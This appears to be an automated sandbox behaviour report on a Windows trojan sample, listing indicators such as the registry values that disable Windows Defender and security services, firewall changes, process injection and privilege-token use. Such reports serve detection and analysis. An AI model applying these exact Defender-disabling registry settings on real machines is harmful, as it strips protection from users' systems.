c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
408	netsh.exe
5040	netsh.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/memory/4680-1101-0x0000000074740000-0x0000000074749000-memory.dmp	acprotect

Deletes itself 1 IoCs

pid	Process
3232	explorer.exe

Executes dropped EXE 62 IoCs

pid	Process
4484	dotNetFx40_Full_setup.exe
116	Setup.exe
3624	dotNetFx45_Full_setup.exe
4004	Setup.exe
2312	SetACL64.exe
904	SetACL64.exe
5056	SetACL64.exe
5020	SetACL64.exe
3052	SetACL64.exe
4980	SetACL64.exe
4116	SetACL64.exe
2568	SetACL64.exe
1324	PowerRun64.exe
3528	PowerRun64.exe
4400	PowerRun64.exe
2824	PowerRun64.exe
4144	PowerRun64.exe
3588	PowerRun64.exe
2656	PowerRun64.exe
2592	PowerRun64.exe
5080	PowerRun64.exe
3428	PowerRun64.exe
5028	PowerRun64.exe
2368	PowerRun64.exe
1940	PowerRun64.exe
3340	PowerRun64.exe
4368	PowerRun64.exe
2284	PowerRun64.exe
1028	PowerRun64.exe
3096	PowerRun64.exe
464	PowerRun64.exe
1616	PowerRun64.exe
2572	PowerRun64.exe
4312	PowerRun64.exe
3724	PowerRun64.exe
60	PowerRun64.exe
4124	PowerRun64.exe
1268	PowerRun64.exe
4104	PowerRun64.exe
3560	PowerRun64.exe
3136	PowerRun64.exe
3048	PowerRun64.exe
3920	PowerRun64.exe
5084	PowerRun64.exe
3428	PowerRun64.exe
3084	PowerRun64.exe
2728	PowerRun64.exe
2116	PowerRun64.exe
1528	PowerRun64.exe
4776	PowerRun64.exe
1292	PowerRun64.exe
2680	PowerRun64.exe
4100	PowerRun64.exe
2000	PowerRun64.exe
1616	PowerRun64.exe
2440	PowerRun64.exe
2156	PowerRun64.exe
2620	PowerRun64.exe
3436	PowerRun64.exe
828	PowerRun64.exe
464	mbbyfatkrvotaiy.exe
3824	win_version_csharp.exe

Loads dropped DLL 12 IoCs

pid	Process
4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
116	Setup.exe
116	Setup.exe
4004	Setup.exe
4004	Setup.exe
4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	SetACL64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	SetACL64.exe

Modifies Security services 2 TTPs 10 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

persistence privilege_escalation

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4680 set thread context of 3232	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	282

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4680-1101-0x0000000074740000-0x0000000074749000-memory.dmp	upx

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3900	powershell.exe
3944	powershell.exe
3420	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dotNetFx45_Full_setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mbbyfatkrvotaiy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Setup.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
116	Setup.exe
116	Setup.exe
116	Setup.exe
116	Setup.exe
116	Setup.exe
116	Setup.exe
116	Setup.exe
116	Setup.exe
4004	Setup.exe
4004	Setup.exe
4004	Setup.exe
4004	Setup.exe
4004	Setup.exe
4004	Setup.exe
4004	Setup.exe
4004	Setup.exe
1324	PowerRun64.exe
1324	PowerRun64.exe
1324	PowerRun64.exe
1324	PowerRun64.exe
3528	PowerRun64.exe
3528	PowerRun64.exe
3528	PowerRun64.exe
3528	PowerRun64.exe
4400	PowerRun64.exe
4400	PowerRun64.exe
4400	PowerRun64.exe
4400	PowerRun64.exe
4144	PowerRun64.exe
4144	PowerRun64.exe
4144	PowerRun64.exe
4144	PowerRun64.exe
3588	PowerRun64.exe
3588	PowerRun64.exe
3588	PowerRun64.exe
3588	PowerRun64.exe
2592	PowerRun64.exe
2592	PowerRun64.exe
2592	PowerRun64.exe
2592	PowerRun64.exe
5080	PowerRun64.exe
5080	PowerRun64.exe
5080	PowerRun64.exe
5080	PowerRun64.exe
5028	PowerRun64.exe
5028	PowerRun64.exe
5028	PowerRun64.exe
5028	PowerRun64.exe
2368	PowerRun64.exe
2368	PowerRun64.exe
2368	PowerRun64.exe
2368	PowerRun64.exe
3340	PowerRun64.exe
3340	PowerRun64.exe
3340	PowerRun64.exe
3340	PowerRun64.exe
4368	PowerRun64.exe
4368	PowerRun64.exe
4368	PowerRun64.exe
4368	PowerRun64.exe
1028	PowerRun64.exe
1028	PowerRun64.exe
3096	PowerRun64.exe
3096	PowerRun64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	2312	SetACL64.exe
Token: SeRestorePrivilege	2312	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2312	SetACL64.exe
Token: SeBackupPrivilege	904	SetACL64.exe
Token: SeRestorePrivilege	904	SetACL64.exe
Token: SeTakeOwnershipPrivilege	904	SetACL64.exe
Token: SeBackupPrivilege	5056	SetACL64.exe
Token: SeRestorePrivilege	5056	SetACL64.exe
Token: SeTakeOwnershipPrivilege	5056	SetACL64.exe
Token: SeBackupPrivilege	5020	SetACL64.exe
Token: SeRestorePrivilege	5020	SetACL64.exe
Token: SeTakeOwnershipPrivilege	5020	SetACL64.exe
Token: SeBackupPrivilege	3052	SetACL64.exe
Token: SeRestorePrivilege	3052	SetACL64.exe
Token: SeTakeOwnershipPrivilege	3052	SetACL64.exe
Token: SeBackupPrivilege	4980	SetACL64.exe
Token: SeRestorePrivilege	4980	SetACL64.exe
Token: SeTakeOwnershipPrivilege	4980	SetACL64.exe
Token: SeBackupPrivilege	4116	SetACL64.exe
Token: SeRestorePrivilege	4116	SetACL64.exe
Token: SeTakeOwnershipPrivilege	4116	SetACL64.exe
